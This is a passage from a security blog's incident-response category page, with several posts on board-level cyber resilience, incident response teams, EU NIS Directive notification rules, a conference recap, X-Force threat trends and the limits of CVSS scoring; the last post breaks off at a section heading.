Browsing category

Incident Response (IR)

Chief Information Security Officer (CISO), Collaboration, cyber resilience, cyber risk, Governance, Incident Response (IR), IT Infrastructure, Risk Management, Security Leadership, Threat Detection, Threat Sharing,

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly makes way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Christophe Veltsos

Forrester Research, IBM X-Force Command Center, IBM X-Force Incident Response and Intelligence Services (IRIS), Incident Management, Incident Response, Incident Response (IR), Incident Response Plan, Security Leaders, Security Leadership, Security Professionals, Security Training, Threat Intelligence,

5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line

How you respond to a data breach matters.

In today’s world, most companies have documented policies and technologies that can help prepare them for grappling with a cyber intruder, but in many cases those tactics are insufficient — focusing more on answering questions about the incident itself and less about an integrated response that protects reputation, the business and, most importantly, clients.

A breach can be damaging, and the inability to respond effectively can add even more self-inflicted damage. The good news is, while you can’t control whether or not you’re a target of a breach, you can control how — and how well — you respond.

Leading organizations that analyze business trends have taken note of the importance of an integrated response. Earlier this week, Forrester released “The Forrester Wave: Cybersecurity Incident Response Services, Q1 2019.” This report encourages customers to look for providers that can ensure timely preparation and breach response. Some characteristics highlighted in the report include vendors that have cyber range capabilities to train employees in the event of an attack and provide thorough deliverables to help beyond postmortem of the incident.

Forrester evaluated 15 incident response (IR) service providers and weighed them across 11 criteria. These vendors were identified, evaluated, researched, analyzed and scored. The Forrester Wave report shows how each provider measures up and helps security and risk professionals make the right choice. Forrester noted that IBM “is a strong choice for training and incident preparation services” and that it “attaches X-Force threat intelligence analysts to its IR teams to ensure full situational awareness across the investigation.”

The IBM X-Force Incident Response and Intelligence Services (IRIS) team was created in 2016 and launched alongside the X-Force Command Cyber Range in Cambridge, Massachusetts. We knew that pairing a strong IR team with an immersive range experience that tests skills to survive the inevitable would greatly increase the success our clients experience in the event of a breach.

5 Characteristics of an Elite IT Team

As leaders of the X-Force IRIS team, we’ve been on the front line of hundreds of security breaches and built a team of elite practitioners that help clients recover quickly and effectively in the wake of an attack. Here are the top five characteristics of a world-class response team, based on our experience.

1. It Starts With People

One of the things we often say is, “IR is a team sport.” And with any team, it’s important to make sure each player has a unique set of skills that, when combined with the rest, compose a formidable force against your opponent.

The right team with the right skills means you solve problems faster, build more creative solutions to challenges, and have diverse insight and perspective on situations that allows you to view the problem from a variety of angles. That’s important, because often the attackers have assembled teams of skilled individuals that represent different experiences and perspectives themselves, so constructing an internal team in a similar manner enables you to quickly identify tactics and anticipate the next move.

2. Great Technology, Dynamic Analysis

When you’re technology agnostic, you can go beyond the tools available in your backyard and better ensure you’re getting the right capabilities to achieve your objective. We’ve learned that when we’re not tied to a specific technology or limited to one analytical methodology, we can rapidly evolve our approach to swiftly detect an attacker’s ever-shifting activity.

3. Embedded Threat Intelligence Capabilities

For every case we open, we embed an intelligence analyst who stays involved from start to finish. They bring a consistent intel perspective to each case, augmenting their own skills by leveraging unique insights from the larger intelligence team. Their combined insight gives us exceptional views into an adversary’s actions, tools and methodologies. Understanding these aspects allows faster, more accurate mitigation actions.

4. Comprehensive Remediation

There are two important focus areas for remediation: tactical and strategic. The tactical emphasizes removing an attacker and their access from the victim environment, and the strategic centers on ensuring that same type of attack is not successful again. They both matter, because getting an intruder out quickly and making sure you’re not vulnerable to the same kind of exploitation keeps you safer.

But there’s an element that goes beyond the tactical and the strategic: rebuilding an environment that’s been destroyed as the result of an attack. Rebuilding an environment requires a set of precision skills and, often, a great deal of human resources to ensure it’s done quickly, accurately, and in a way that enables you to continue to operate while rebuilding and recovery take place.

We built the X-Force IRIS team with a set of practitioners that, together, represent thousands of hours of experience rebuilding devastated environments from the ground up. That means when a client has been ravaged by an attack, it can rely on us to not only help it remediate, but keep its business running while we rebuild anew.

5. Train Like You Fight, Fight Like You Train

Even the best IR plan is insufficient if you don’t practice it. We encourage clients to run battle drills on their IR plans (and even put our own to the test). While tabletop exercises can be informative, by far the best way to train for a cyber breach is through an immersive, instructor-led range experience.

We combine our IR expertise with the X-Force Command Cyber Range. Here, we immerse clients in a highly gamified scenario that tests not only their IR plan, but also their human abilities to respond and adapt in a crisis. This helps uncover gaps in existing processes and silos in an organization and develop ways to respond to a breach in an integrated fashion that can’t be replicated in any other way.

Competitive Collaboration

Leaders named in the Forrester Wave — such as FireEye, CrowdStrike and Deloitte — are proving that effective incident response is worth the investment. And as competitors, we have the opportunity to share information and create a more robust collective defense for our clients when possible. We are enthusiastic about opportunities like this that allow us to share and build knowledge, because when cybersecurity is implemented correctly, it enables transformation and business growth regardless of the competitive landscape.

The X-Force IRIS team’s investigative and analytical methodology will continue to adapt to meet future IR challenges. By combining cutting-edge methodology with new technologies across disjointed security layers, we envision that our clients will get the context they need to eliminate the noise and identify the most critical threats so they can get can back to what matters most: their core business.

Download the report

The post 5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Ahmed Saleh

Cybersecurity Legislation, Data Protection, General Data Protection Regulation (GDPR), Incident Response, Incident Response (IR), Incident Response Plan, Network Security, regulatory compliance, Threat Detection,

Breaking Down the Incident Notification Requirements in the EU’s NIS Directive

Our society relies on the availability, security and reliability of network and information systems (NIS). Various security frameworks provide standards and guidance as to which measures organizations should implement to protect IT systems and increase resilience. However, since such recommendations are not ingrained as actual laws in most countries, these best practices and guidelines are often followed solely on a voluntary basis.

This is contrary to the European Union (EU)’s NIS Directive; a legislation that sets a range of network and information security requirements to augment IT security across all EU member states. While the directive covers a few different domains, including preparedness, cross-EU collaboration and incident response (IR), one of its main pillars focuses on breach notification requirements.

In this post, we will focus specifically on the aspects of incident notification contained in the NIS Directive as they apply to operators of essential services (OES).

Regulations Versus Directives

The NIS Directive is a different type of legal act compared to, say, the General Data Protection Regulation (GDPR). The latter is immediately applicable and enforceable by law in all member states. A directive is somewhat different.

While it also applies to all member states, instead of being immediately applicable, it sets goals, requirements and results that must be achieved. It is then up to each member state to devise its own laws on how to reach these goals and what types of penalties noncompliance will carry. The NIS Directive also sets a floor. There can be greater requirements applicable based on the organization’s industry sector and member state(s) it operates in.

This legal status reveals one of the possible issues with a directive: Whereas a regulation is direct law, a directive needs to be transposed into local laws by each member state. These transpositions can result in differences in the implementation of the directive into law, in some cases complicating matters for organizations that operate across borders.

Variance in Incident Notification Definitions

One of the articles in the NIS Directive that has received a lot of attention is Article 14, which outlines requirements for security and incident notification. It stipulates that member states must ensure that OES notify the national competent authority and the national computer security incident response team (CSIRT) in case of an incident that significantly impacts the continuity of an essential service. This is not entirely new — depending on the type of activity or sector, there are already requirements for incident reporting in Europe, including Article 13a of the Telecom Framework Directive.

An additional element of complexity is that, according to Article 5, the identification of OES per sector needs to happen individually within each member state. Although organizations might give input to this process, the actual identification is out of their hands. This process is another way by which the directive could result in various interpretations that end up adding complexity.

The Benefits of Incident Notification

One of the drivers for notification in the context of the directive is to be compliant with legal requirements. However, if the starting point of your organization is to only comply with the bare minimum of these notification requirements, then you will miss out on the opportunities provided by the directive.

Additionally, the bulk of these requirements, including notification and detection capabilities, should already be covered in large part by your existing security environment. If this is not the case, you can use the NIS Directive as a wake-up call to improve your security posture.

From a policymaker’s point of view, the notification requirements can help better identify the challenges within a sector and propose mitigation measures that are based on actual facts and figures. These facts and figures can then be used by CSIRTs (or a responsible authority) to provide more relevant warnings and situation reports together with sector-specific threat intelligence. Similarly, this information can also be used to evaluate cross-border impact of incidents or threats and optionally notify other member states.

Breaking Down Notification Requirements

Now, let’s dive into some details of the NIS Directive. There are essentially three main parts to the notification requirement.

First, prior to notification, organizations need to be able to detect security incidents — i.e., they must possess appropriate detection capabilities. The second part involves defining what a significant incident is and what risks, either directly or indirectly, can have significant impact on an essential service. The last part of the notification requirement involves understanding when, what, how and to whom organizations must report incidents.

First Things First — Detection

Every notification starts with proper detection of an incident. You can find guidelines on detection capabilities in a reference publication from the NIS Cooperation Group on security measures.

The core principles for these security measures include being effective, tailored, compatible, proportionate, concrete, verifiable (evidence of the effective implementation of security policies) and inclusive (includes all security domains that may contribute to reinforcing cybersecurity).

Applying NIS measures to the domain of detection and resilience can be done by:

  • Setting up a detection system to analyze files and protocols — this can include, for example, network intrusion detection systems (NIDSs) or malware sandboxes;
  • Enabling logging on critical systems (log entries should include time stamps);
  • Collecting the logs centrally; and
  • Conducting log correlation and analysis on the events coming from critical systems.

All of the above actions can also be automated with a security information and event management (SIEM) solution.

After Detection — Defining Incidents

But what, exactly, is a security incident? Article 4 defines it as any event that has an actual “adverse effect” on the security of network and information systems. As a side note, the directive does not include a definition of what is covered by “adverse.”

Based on the information from the NIS Cooperation Group, we can combine the definition of an incident with the definition of security of network and information systems. This would redefine an incident to be any event that affects the authenticity, confidentiality, integrity or availability of network and information systems, and has a significant impact on the continuity of the essential service itself.

What Is a Significant Incident?

A set of three parameters from Article 14 of the NIS Directive can be used to determine what is considered a significant incident:

  • The number of users that are affected by the disruption of the essential service.
  • The duration of the incident.
  • The geographic spread of those affected by the incident.

Additionally, the parameters from Article 6 are also helpful in defining what qualifies as a significant incident:

  • What is the dependency of other OES on the service affected by the incident?
  • What is the impact (degree, duration) on economic and social activities or on public safety? In particular, the impact on social activities can be hard to measure for OES.
  • How large is the market share of the affected service?
  • What is the geographic spread that could be affected?
  • How important is the affected element for maintaining a sufficient level of service?

In general, these parameters are most often already included in what OES are accustomed to using to define crises within their services that are unrelated to IT.

The actual criteria, thresholds and parameters for determining substantial incidents are defined by member states. This can include the parameters defined in the NIS Directive, possibly extended with other states or by sector-specific criteria.

The Directive’s Notification Timeline

According to Article 14, organizations need to notify without undue delay, although this timeline can be shortened or specified based on the member state. The term “undue” can also be subjective, but in most cases, this means the organization must send a preliminary notification whenever an incident is first detected, even if all the details are not available yet. The goal is to raise awareness. As your investigation progresses, you can provide intermediate follow-ups, and when the incident is closed, you can provide a full report.

It’s fairly simple to implement this step. Your IR plan should already include a notification and escalation path for certain types of critical incidents during the detection and analysis phases. It should also foresee a final incident report as part of the lessons-learned phase.

In essence, this requirement is an extension of an already established IR plan and recovery process.

Where to Report?

Each member state is free to choose its own reporting framework. This can be the national authority, sectorial authorities or a combination of both in addition to notifying the national CSIRTs.

As an organization, it is important to identify to whom you have to report, exchange contact details between your security team and the notification body, and establish and test this communication process.

Use the NIS Directive as an Opportunity

Similar to the GDPR, you can approach this directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture. The fact that some security requirements are legal requirements can help you further establish your security program.

There are many articles in the directive to take into account, but you should start by focusing on the following:

  • Article 4, which defines a security incident;
  • Article 5, which mandates that member states should identify OES;
  • Article 6, which sets additional parameters to define significant incidents; and
  • Article 14, which requires you to implement security measures and notification processes. This article also contains the three base parameters to define what is a significant incident and describes the accepted delay for notifications.

Unfortunately, despite the fact that the bulk of the NIS Directive has been well-known for quite some time, not all EU member states have finalized the phase of transposing the recommendations into actual laws.

If this is the case for your environment, you might benefit from the situation and provide your lawmakers with input for security measures that would actually improve the level of security for network and information systems in your sector.

The post Breaking Down the Incident Notification Requirements in the EU’s NIS Directive appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Koen Van Impe

Artificial Intelligence (AI), CISO, Cloud, Cloud Security, Connected Devices, Cyberattacks, Data Privacy, Data Protection, Healthcare, healthcare security, himss, Incident Response (IR), Information Sharing, Quantum Computing, Risk Management, Security Conferences, Threat Response, Watson, X-Force,

Recapping IBM Think 2019 and HIMSS19: The Shared Landscape of Global Security

With IBM Think 2019 and HIMSS19 in the books, it’s worth making time for a quick debrief. Which topics resonated the most with attendees? Where did conference themes and discussions overlap? And what’s on the horizon for global cybersecurity this year and beyond?

Key Takeaways From Think 2019 and HIMSS19

According to IBM CEO, President and Chairman Ginni Rometty in her Think opening address, “chapter two” of digital transformation has arrived. For Rometty, this next chapter is scalable, driven by artificial intelligence (AI) and embedded across the enterprise. But without information architecture, she noted, “there is no AI.”

Trust underpins every aspect of effective digital transformation. This ties into IBM’s biggest push during the conference: Watson Anywhere. Built on the open-source orchestration engine Kubernetes, the microservices-based Watson Anywhere empowers organizations to run AI across the cloud environment of their choice, in effect democratizing AI technology to meet consumers along the path of their digital transformation journey — wherever they may be.

HIMSS19, meanwhile, had a clear focus on patient data, specifically the development of interoperability rules that prevent data blocking and empower effective information sharing. But there was also significant overlap with IBM’s initiatives; as Healthcare Dive reported, cloud and AI innovations were on full display at the Orlando event. Even more telling was the conference’s tag line, “Champions of Health Unite,” which speaks to the democratization and rapid uptake of healthcare technology, in turn allowing patients to manage their own healthcare experiences.

Hot Topics in San Francisco and Orlando

In San Francisco, IBM thought leaders, innovators and industry front-runners provided hundreds of great sessions for attendees, covering topics from AI acceleration to quantum computing and innovative security. Highlights included:

  • Accelerating the Journey to AIWhile 80 percent of organizations recognize the strategic potential of AI, just 19 percent understand what’s required to convert potential into profitability. State of New Jersey Judiciary CIO Jack McCarthy was joined by IBM Cloud and Cognitive Software Senior Vice President Arvind Krishna and other experts to help attendees develop a prescriptive approach to AI development across any cloud.
  • Innovation Doesn’t Happen Without Security. And Security Needs InnovationGlobal security challenges demand innovative technologies capable of doing more than responding to threats as they occur. But the innovation required to stay ahead of your competition isn’t possible without a solid security foundation. In this session, IBM Security General Manager Mary O’Brien, Westfield Insurance CISO Kevin Baker and former professional racecar driver Danica Patrick tackled the cyclical challenge of security, innovation and IT evolution.
  • The Journey to Cloud Community CrowdChat — In a more free-form session, the #Think2019 conference community CrowdChat tackled the challenge of cloud transition. According to Silicon Angle, chat participants highlighted both emerging needs for cloud-native tools capable of delivering “unprecedented flexibility” and commensurate security practices that drive both effective application development and DevOps processes.
  • Access the Future Today: Quantum ComputingWhile quantum computing has largely been confined to high-level enterprise use, this IBM session — led by Dr. Dario Gil, director of IBM Research — spoke to the development of road maps for mainstream adoption of cloud computing and how businesses could benefit from quantum solutions in the near term.

At HIMSS, meanwhile, hot conference topics included:

  • Patient-Centric Health Information ExchangeDisparate health information management systems are causing problems for physicians and patients alike. In this session, IBM Blockchain Solutions Architect Shahryar Sedghi and AT&T Director of Healthcare Solutions Thyge Knuhtsen helped define the requirements for patient-centric healthcare interoperability resources that leverage tools such as blockchain to “liberate” personal healthcare data.
  • Combating Cyberattacks with a Security ResidencyJennifer Kady, director of IBM Security solutions for the U.S. public sector, tackled the increasing risk of cybersecurity incidents with a new solution: security “residencies” that help train healthcare IT teams to effectively respond in the event of an attack.
  • Mitigating the Next Generation of Risk: Connected Medical DevicesThe use of connected medical devices is on the rise, but just 51 percent of device manufacturers follow FDA guidance to mitigate risks. This session focused on the development of programmatic, end-to-end security approaches to secure both IT assets and medical devices.
  • Reactions from the Field: AIThree industry leaders came together for a discussion of healthcare AI in the field. What’s working, what isn’t and what needs to change? From streamlining workflows and eliminating repetitive tasks, cloud-based AI has real potential for healthcare if companies can leverage clean, normalized “good data” to make accurate predictions and take critical action.

The Future of Global Security

Cybersecurity is now a serious global concern. For healthcare organizations, this is reflected in the $1.4 million it costs to recover from “average” cyberattacks, according to HealthITSecurity, and worrisome data from Proofpoint that shows health-focused email attacks are up 473 percent over the last two years. For IBM, AI-driven digital transformations aren’t possible without the solid foundation of innovative security and consumer trust.

Taken together, the topics and keynotes from both conferences suggest three emerging trends for cybersecurity in 2019:

  • Intelligence-driven response — Innovation drives success, and security is no exception. The rise of any-cloud AI makes innovative, intelligence-led incident response (IR) an attainable goal, and one that will quickly become necessary as threat actors leverage their own versions of AI to compromise global targets.
  • Personalized accountability — Patient healthcare data is an incredibly valuable resource. While the shift to “unblocked” data offers more granular control for patients and caregivers alike, it also speaks to the need for increased accountability; from connected devices to security readiness, enterprises must be prepared to defend data both at scale and in-situ.
  • Open data defense — Interoperability is critical for healthcare data, and data sharing is paramount for advanced AI systems. As data becomes more “open,” organizations must leverage advanced solutions such as quantum computing and IBM X-Force residencies to help defend this critical resource.

We’re only a few months into the year, but HIMSS19 and Think 2019 have already helped shape this year’s focus on enterprise transformation, innovation and global cybersecurity.

The post Recapping IBM Think 2019 and HIMSS19: The Shared Landscape of Global Security appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Douglas Bonderud

cryptocurrency, cryptocurrency miner, IBM Security, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Incident Response (IR), Ransomware, Skills Gap, threat hunting, Threat Intelligence, X-Force,

Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks

Cybercriminals made a lot of noise in 2017 with ransomware attacks like WannaCry and NotPetya, using an in-your-face approach to cyberattacks that netted them millions of dollars from victims. But new research from IBM X-Force, the threat intelligence, research and incident response arm of IBM Security, revealed that 2018 saw a rapid decline in ransomware attacks as cybercrime gangs shifted tactics to remain under the radar.

Ransomware attacks declined by 45 percent between Q1 2018 and Q4 2018, according to the research. That doesn’t mean cybercrime is on the decline, however. Instead, cybercriminals employed cryptojacking, the stealthy theft of computing power to generate cryptocurrency, at a much higher rate. Cryptojacking surged by 450 percent over the course of 2018, according to the newly released “IBM X-Force Threat Intelligence Index 2019.”

Wendi Whitmore, global lead of the IBM X-Force Incident Response and Intelligence Services (IRIS) team, said in an interview that ransomware was highly successful for several years, but the payoff was starting to decline.

“It appears, for a variety of reasons, cybercriminals are getting less money from ransomware attacks and potentially getting a better return on their investment and their time from cryptojacking,” Whitmore said.

IBM X-Force observed a 45 percent decline in ransomware attacks and a 450 percent increase in cryptojacking over the course of 2018, as shown by the trend lines in this chart.

Cryptojacking and Other Stealth Attacks

The term cryptojacking refers to the illicit use of computing resources to generate cryptocurrency such as bitcoin, which peaked in value at nearly $20,000 in late 2017, and Monero, which has generated millions of dollars for cybercriminals over the past decade.

Cryptojacking involves infecting a victim’s computer with malware or through browser-based injection attacks. The malware uses the processing power of the hijacked computer to mine (generate) cryptocurrency. The spike in central processing unit (CPU) usage may cause systems to slow, and enterprises may be affected by the presence of the malware on their network servers and employee devices.

While less destructive than ransomware, the presence of cryptomining malware in enterprise environments is concerning because it indicates a vulnerability that may be exploited in other attacks.

“The victim doesn’t usually know their computer has taken over for that purpose,” Whitmore said.

Yet an even stealthier form of attack doesn’t use malware at all. More than half of cyberattacks (57 percent) seen by X-Force IRIS in 2018 did not leverage malware, and many involved the use of nonmalicious tools, including PowerShell, PsExec and other legitimate administrative solutions, allowing attackers to “live off the land” and potentially remain in IT environments longer. These attacks could allow cybercriminals to harvest credentials, run queries, search databases, access user directories and connect to systems of interest.

Attacks that don’t use malware are much more challenging for defense teams to detect, Whitmore said, because they are leveraging tools built into the environment and can’t be identified through signatures or typical malware detection techniques. Instead, defense teams need to detect malicious commands, communications and other actions that might look like legitimate business processes.

“Attackers are identifying that it’s a lot easier to stay in an organization longer-term if they don’t install anything funny that might get detected by a wide variety of technologies, or by really smart defenders who are constantly looking in the environment to identify something that’s new or different,” Whitmore said.

Attackers are infiltrating IT environments with stealthy techniques that target misconfigurations and other system vulnerabilities, Whitmore said, and using tried-and-true methods that are still very difficult to prevent at a wide scale, such as phishing. Publicly disclosed security incidents involving misconfiguration increased by 20 percent between 2017 and 2018, according to X-Force research. Meanwhile, IBM X-Force Red, an autonomous team of veteran hackers within IBM Security who conduct various types of hardware and software vulnerability testing, finds an average 1,440 unique vulnerabilities per organization.

Still, humans represent one of the largest security weaknesses, with 29 percent of attacks analyzed by IBM X-Force involving compromises via phishing emails. Nearly half (45 percent) of those phishing attempts were business email compromise (BEC) scams, also known as CEO fraud or whaling attacks.

These highly targeted attacks are aimed at individuals responsible for making payments from business accounts, claiming to come from someone inside the organization such as the CEO or chief financial officer (CFO). The FBI reported that between October 2013 and May 2018, BEC fraud had cost organizations $12.5 billion.

Read the complete X-Force Threat Intelligence Index Report

Transportation in the Crosshairs

Among the more surprising findings in this year’s X-Force Threat Intelligence Index report is the level of attacks on the transportation industry, which was the second-most attacked industry in 2018, behind only financial services. In 2017, transportation was the 10th most targeted industry, but in 2018 it was targeted in 13 percent of attacks, behind financial services, which was targeted in 19 percent of attacks.

“That was a pretty surprising finding for us,” Whitmore said. “To see the transportation industry emerge as the second-most impacted industry really means that we’re seeing a lot more activity overall in that industry.”

A few factors changed the game this year, Whitmore noted, including the industry’s growing reliance on data, website applications and mobile apps, and the increasing amount of information consumers are sharing. Transportation companies hold valuable customer data such as payment card information, personally identifiable information (PII) and loyalty rewards accounts. Cybercriminals are interested in targeting that information to monetize it.

Additionally, Whitmore said, there’s “a widespread attack surface in the transportation industry, leveraging things like third-party providers with legacy systems and a lot of communications systems that are out of their direct management.”

Proactive Defenses and Agile Response

There are signs that organizations are increasing their security hygiene by applying best practices such as access controls, patching vulnerabilities in software and hardware, and training employees to spot phishing attempts, Whitmore said.

Yet cybersecurity is a daily fight, and the security skills gap means security teams have to be agile and collaborative while augmenting their capabilities with supporting security technologies and services.

The IBM X-Force Threat Intelligence report offers recommendations for organizations to increase preparedness through preventive measures such as threat hunting — proactively searching networks and endpoints for advanced threats that evade prevention and detection tools.

Additionally, risk management models need to consider likely threat actors, infection methods and potential impact to critical business processes. Organizations need to be aware of risks arising from third parties, such as cloud service providers, suppliers and acquisitions.

Finally, the IBM X-Force Threat Intelligence Index emphasizes remediation and incident response. Even organizations with a mature security posture may not know how to respond to a security incident. Effective incident response is not only a technical matter; leadership and crisis communications are key to rapid response and quickly resuming business operations.

Read the complete X-Force Threat Intelligence Index Report

The post Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: John Zorabedian

Incident Management, Incident Response (IR), Penetration Testing, Software & App Vulnerabilities, Vulnerability, Vulnerability Management, X-Force,

Calling Into Question the CVSS

For almost 15 years now, companies have been using the Common Vulnerability Scoring System (CVSS) to determine the criticality of security vulnerabilities. Ten is the highest score, meaning the most severe, while zero is the lowest. Over time, the CVSS has become something of a de facto industry standard used by most major vendors as well as the National Vulnerability Database (NVD).

CVSS scores were designed to measure the level of severity of an identified vulnerability in relation to where that vulnerability was found. Many organizations have used the scores to prioritize which vulnerabilities to fix first, which is an essential component of vulnerability management. However, the CVSS was never meant to be used on its own for prioritization, and such use has created many debates within the security community, particularly where those assessing risk require more context about vulnerabilities than a technical score.

The CVSS Wasn’t Designed to Measure Risk

In December 2018, the Software Engineering Institute at Carnegie Mellon published a report titled “Towards Improving CVSS.” The authors explain how the CVSS is being misused as a risk score and dive into why the output can be unreliable when prioritizing vulnerability fixes is based solely on the CVSS. A few excerpts from the report align with some of the existing lines of thought about why the CVSS alone is not enough for vulnerability prioritization.

For example, some organizations use the CVSS as the sole driver for prioritizing vulnerability patching policies, while what they truly need is to work on the bigger risk picture, of which the CVSS is but one component of many.

To that effect, the report states, “CVSS is designed to identify the technical severity of a vulnerability. What people seem to want to know, instead, is the risk a vulnerability or flaw poses to them, or how quickly they should respond to a vulnerability. If so, then either CVSS needs to change or the community needs a new system.”

For the most part, IBM Security’s team of veteran hackers, X-Force Red, agrees with that conclusion. A new system is needed, and it should incorporate more risk-focused contextual information when prioritizing which vulnerabilities to fix first. However, it’s important to keep in mind that the CVSS was never meant to measure risk to a certain organization; it was meant to measure the severity of the vulnerability. As such, upending the scoring system isn’t the solution. Instead, we need a new method for prioritizing vulnerabilities that incorporates the CVSS and contextual factors specific to each organization’s environment.

The Components of the CVSS

The CVSS Specification Document states that the CVSS score is composed of three metric groups: base, temporal and environmental. Most published CVSS scores only report the base metric, which describes characteristics of the vulnerability that are constant over time. The temporal group includes exploit code maturity and available remediations that are independent of a particular environment. Finally, the environmental metric can only be assessed with knowledge of the environment where a vulnerable system resides.

The researcher who creates the CVSS for the discovered vulnerability will oftentimes not factor in the environmental score or mark it as “zero” because he or she is not familiar with each individual environment. In order for the environmental score to be taken into account, a security analyst in each affected organization would need to assess his or her environment and change the score. Being that many organizations are strapped with limited resources, time and skill sets, having an analyst who can do this is not likely.

The three metric groups of the CVSS do not account for the risk posed based on the business value of an asset, nor were they ever supposed to. The CVSS is a severity rating, not a risk score. The environmental score can modify the base score by taking into consideration local mitigation factors and configuration details. It can also adjust the impact to an asset’s confidentiality, integrity and availability (CIA) if the vulnerability were exploited. However, it is still a measure of severity and does not consider the value of the exposed asset to the organization, which is a key risk factor.

Contextual Data the CVSS Does Not Consider

